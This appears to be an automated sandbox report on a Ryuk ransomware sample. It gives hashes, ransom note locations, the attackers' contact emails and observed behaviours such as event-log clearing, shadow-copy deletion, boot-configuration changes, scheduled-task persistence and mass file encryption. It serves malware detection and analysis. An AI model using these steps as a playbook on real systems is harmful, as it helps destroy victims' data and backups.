Analysis
-
max time kernel
150s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
09-03-2023 18:22
Static task
static1
Behavioral task
behavioral1
Sample
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
Resource
win10v2004-20230220-en
General
-
Target
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
-
Size
885KB
-
MD5
6a5bf25ff4f72ebca91280ffda057260
-
SHA1
722063331acdbfc93ccbfacbec045800a835dd9e
-
SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
-
SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
-
SSDEEP
12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Vulcanteam@CYBERFEAR.COM
vulcanteam@inboxhub.net
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Clears Windows event logs 1 TTPs 51 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepid process 1676 wevtutil.exe 3768 wevtutil.exe 4448 wevtutil.exe 3652 wevtutil.exe 3348 wevtutil.exe 3504 wevtutil.exe 3000 wevtutil.exe 1364 wevtutil.exe 2072 wevtutil.exe 4644 wevtutil.exe 5064 wevtutil.exe 3736 wevtutil.exe 288 wevtutil.exe 1284 wevtutil.exe 5044 wevtutil.exe 3936 wevtutil.exe 3832 wevtutil.exe 4860 wevtutil.exe 1876 wevtutil.exe 1516 wevtutil.exe 4732 wevtutil.exe 2904 wevtutil.exe 2148 wevtutil.exe 4176 wevtutil.exe 820 wevtutil.exe 1128 wevtutil.exe 2472 wevtutil.exe 2160 wevtutil.exe 3056 wevtutil.exe 2324 wevtutil.exe 1320 wevtutil.exe 4508 wevtutil.exe 4920 wevtutil.exe 2116 wevtutil.exe 5032 wevtutil.exe 4924 wevtutil.exe 2484 wevtutil.exe 3512 wevtutil.exe 3212 wevtutil.exe 3496 wevtutil.exe 4832 wevtutil.exe 2476 wevtutil.exe 424 wevtutil.exe 1108 wevtutil.exe 4748 wevtutil.exe 2700 wevtutil.exe 3992 wevtutil.exe 3308 wevtutil.exe 4548 wevtutil.exe 1620 wevtutil.exe 4496 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1184 bcdedit.exe 1672 bcdedit.exe -
Processes:
wbadmin.exepid process 3000 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables taskbar notifications via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 42 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\G: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\W: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\B: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\V: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\J: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\N: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\Z: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\U: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\P: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\T: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\R: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\X: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\L: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\A: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\O: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\Q: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\I: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\K: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\M: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\Y: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\E: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\H: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\F: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened (read-only) \??\S: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe -
Drops file in Program Files directory 64 IoCs
Processes:
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exedescription ioc process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\selector.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File created C:\Program Files\RyukReadMe.html 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\db2v0801.xsl.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ul-oob.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main.css.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\OneNote\prnSendToOneNote_win7.inf.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\local_policy.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.ELM.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\or.pak.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmuxmui.msi.16.en-us.xml.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\CSS7DATA000C.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_en_135x40.svg.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sk_get.svg.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MUOPTIN.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fa.pak.DATA.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\PREVIEW.GIF.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\cacerts.pem.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\en-US\MSFT_PackageManagementSource.strings.psd1.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.png.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\TransparentAdvertisers.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ul.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ul-phn.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\selector.js.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Extreme Shadow.eftx.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluCCFilesEmpty_180x180.svg.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\dt.jar.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\OMICAUTINTL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe -
Drops file in Windows directory 5 IoCs
Processes:
wbadmin.exe0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File created C:\Windows\RyukReadMe.txt 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe File created C:\Windows\hrmlog1 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 1532 sc.exe 1620 sc.exe 2008 sc.exe 820 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1272 schtasks.exe 4876 schtasks.exe 4500 schtasks.exe 3412 schtasks.exe -
Interacts with shadow copies 2 TTPs 15 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 2064 vssadmin.exe 3740 vssadmin.exe 4864 vssadmin.exe 1876 vssadmin.exe 4872 vssadmin.exe 4196 vssadmin.exe 2688 vssadmin.exe 228 vssadmin.exe 1356 vssadmin.exe 3540 vssadmin.exe 2052 vssadmin.exe 680 vssadmin.exe 824 vssadmin.exe 3848 vssadmin.exe 3664 vssadmin.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4496 taskkill.exe 4964 taskkill.exe 440 taskkill.exe 4900 taskkill.exe 4844 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings cmd.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 4428 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
